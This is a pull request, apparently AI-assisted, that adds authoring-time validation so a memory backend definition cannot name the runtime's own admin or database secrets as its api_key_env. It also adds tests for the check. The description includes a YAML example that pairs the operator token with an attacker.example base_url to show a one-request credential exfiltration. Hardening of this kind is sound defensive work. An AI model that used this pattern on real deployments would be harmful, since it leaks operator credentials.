### PR TITLE
fix(memory): validate a MemoryBackendDef's api_key_env at authoring time

### DIFF
--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -4652,6 +4652,20 @@ func ExpandEnvAllowed(name string) bool {
 	return false
 }
 
+// EnvNameCredentialSafe reports whether an env-var NAME supplied by a runtime
+// author may be used to resolve a credential: allowlisted AND not one of
+// loomcycle's own infrastructure secrets.
+//
+// Both halves are required, and the denylist is why. ExpandEnvAllowed admits any
+// LOOMCYCLE_-prefixed name, which on its own would admit LOOMCYCLE_AUTH_TOKEN —
+// the operator bearer. A def naming that as its credential source, paired with a
+// def-supplied base_url, is a one-request exfiltration of the runtime's own admin
+// token. The inline pair at expandYAMLEnv already spells this out; exported here
+// so substrate validators enforce the same rule instead of re-deriving half of it.
+func EnvNameCredentialSafe(name string) bool {
+	return ExpandEnvAllowed(name) && !expandDenyNames[name]
+}
+
 // expandDenyNames is the authoritative set of loomcycle's OWN infrastructure /
 // admin secrets that must NEVER be interpolated into a YAML/MCP field, even
 // though the LOOMCYCLE_ prefix (or a bare third-party name) would otherwise

--- a/internal/tools/builtin/memorybackenddef.go
+++ b/internal/tools/builtin/memorybackenddef.go
@@ -521,6 +521,20 @@ func validateMemoryBackendDef(def mergedMemoryBackendDef) error {
 				return err
 			}
 		}
+		// api_key_env gets the SAME authoring-time treatment, and for the same
+		// stated reason: no shipped kind resolves it, but it is the field a future
+		// external kind WOULD resolve — and it is the most dangerous of the three,
+		// because its value would be sent to the def-supplied base_url above.
+		//
+		// Unvalidated, a runtime author could name any env var. Paired with a
+		// base_url they also control, `api_key_env: LOOMCYCLE_AUTH_TOKEN` is a
+		// one-request exfiltration of the operator bearer. The persisted shape must
+		// never hold that, whether or not anything reads it today.
+		if def.Config.APIKeyEnv != "" && !config.EnvNameCredentialSafe(def.Config.APIKeyEnv) {
+			return fmt.Errorf("config.api_key_env %q is not an allowed credential env var "+
+				"(must be LOOMCYCLE_-prefixed or a known third-party key, and must not be one "+
+				"of loomcycle's own infrastructure secrets)", def.Config.APIKeyEnv)
+		}
 	default:
 		return fmt.Errorf("unknown kind %q (must be one of: inprocess)", def.Kind)
 	}

--- a/internal/tools/builtin/memorybackenddef_test.go
+++ b/internal/tools/builtin/memorybackenddef_test.go
@@ -319,3 +319,49 @@ func TestMergedMemoryBackendDef_DriftDetection_VsLookupSubstrate(t *testing.T) {
 		}
 	}
 }
+
+// TestMemoryBackendDefTool_RefusesUnsafeAPIKeyEnv applies this validator's own
+// stated policy to the field it had skipped.
+//
+// The file already validates base_url and tenancy at AUTHORING time on the
+// explicit reasoning that no shipped kind consumes them but a future external kind
+// would, so the persisted shape must never hold a dangerous value. api_key_env was
+// exempt — and it is the most dangerous of the three, because its value would be
+// sent to the def-supplied base_url.
+//
+// Unvalidated, a runtime author could name any env var. `api_key_env:
+// LOOMCYCLE_AUTH_TOKEN` paired with a base_url they also control is a one-request
+// exfiltration of the operator bearer. Nothing resolves it today; the point is
+// that the def can never be stored holding it.
+func TestMemoryBackendDefTool_RefusesUnsafeAPIKeyEnv(t *testing.T) {
+	for _, tc := range []struct {
+		name, env string
+		refuse    bool
+		why       string
+	}{
+		{"operator bearer", "LOOMCYCLE_AUTH_TOKEN", true,
+			"loomcycle's own admin credential — allowed by the LOOMCYCLE_ prefix, denied by the infra-secret set"},
+		{"postgres dsn", "LOOMCYCLE_PG_DSN", true, "loomcycle's own database credential"},
+		{"arbitrary host var", "AWS_SECRET_ACCESS_KEY", true, "not allowlisted"},
+		{"path", "PATH", true, "not allowlisted"},
+		{"loomcycle-scoped key", "LOOMCYCLE_MEMORY_KEY", false, "the intended shape"},
+		{"known third-party", "BRAVE_API_KEY", false, "explicitly allowlisted"},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			tool, ctx, cleanup := memoryBackendDefFixture(t)
+			defer cleanup()
+			body := `{"op":"create","name":"b_` + tc.name[:3] + `","overlay":{"kind":"inprocess",` +
+				`"config":{"api_key_env":"` + tc.env + `"}}}`
+			res, _ := tool.Execute(ctx, json.RawMessage(body))
+			if tc.refuse && !res.IsError {
+				t.Fatalf("api_key_env=%s was accepted (%s); got %s", tc.env, tc.why, res.Text)
+			}
+			if !tc.refuse && res.IsError {
+				t.Fatalf("api_key_env=%s was refused (%s); got %s", tc.env, tc.why, res.Text)
+			}
+			if tc.refuse && !strings.Contains(res.Text, "api_key_env") {
+				t.Errorf("the refusal does not name the offending field: %s", res.Text)
+			}
+		})
+	}
+}


### PR DESCRIPTION
Memory-review **pass 8**, over `memorybackenddef.go`.

## The asymmetry

This validator already checks `base_url` and `tenancy_strategy` at **authoring time**, on reasoning it states explicitly in its own comments: no shipped kind consumes them, but they are the fields a future external kind *would* act on, so the persisted shape must never hold a dangerous value.

`api_key_env` was exempt from that policy — and it's the most dangerous of the three, because its value would be sent to the `base_url` **the same def supplies**.

```yaml
kind: inprocess
config:
  api_key_env: LOOMCYCLE_AUTH_TOKEN   # accepted, and persisted
  base_url: https://attacker.example
```

That's a one-request exfiltration of the operator bearer.

## Not exploitable today

Only the `inprocess` and `fallback` backends exist — nothing reads the env var or dials the URL. The point is the one the file already makes twice: **the persisted shape must be safe before a consumer exists, because the consumer is the part that arrives later.**

`config.go` even promises this — *"the value is resolved (allowlist-gated) at use time in MR-4"*. The allowlist it promises had no exported form to call.

## The fix

`config.EnvNameCredentialSafe` — `ExpandEnvAllowed` **and** not in `expandDenyNames`.

Both halves are required, and the denylist is why: `ExpandEnvAllowed` admits any `LOOMCYCLE_`-prefixed name, which on its own admits `LOOMCYCLE_AUTH_TOKEN`. That pair was already spelled out inline at `expandYAMLEnv`; exporting it means substrate validators enforce the same rule instead of re-deriving half of it.

## Tested

`TestMemoryBackendDefTool_RefusesUnsafeAPIKeyEnv`, six cases:

| env var | outcome | why |
|---|---|---|
| `LOOMCYCLE_AUTH_TOKEN` | refused | allowed by prefix, **denied as infra secret** |
| `LOOMCYCLE_PG_DSN` | refused | loomcycle's own DB credential |
| `AWS_SECRET_ACCESS_KEY` | refused | not allowlisted |
| `PATH` | refused | not allowlisted |
| `LOOMCYCLE_MEMORY_KEY` | accepted | the intended shape |
| `BRAVE_API_KEY` | accepted | explicitly allowlisted |

**Fail-before on both halves:** removing the guard accepts all four unsafe names; keeping only the allowlist accepts *and persists* `LOOMCYCLE_AUTH_TOKEN`.

## Reviewed and found sound

- `base_url`'s `requireHTTPURL` check
- the `shared_key_with_prefix` tenancy guard — a token-less prefix would collapse every tenant into one keyspace, and it deliberately has no `!= ""` escape for that reason
- the `mem9` kind's reject-at-the-door / degrade-in-the-runtime split
- `fallback_on_error`'s closed set

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_016cr9aYJNPecpG8zA1Bk7B8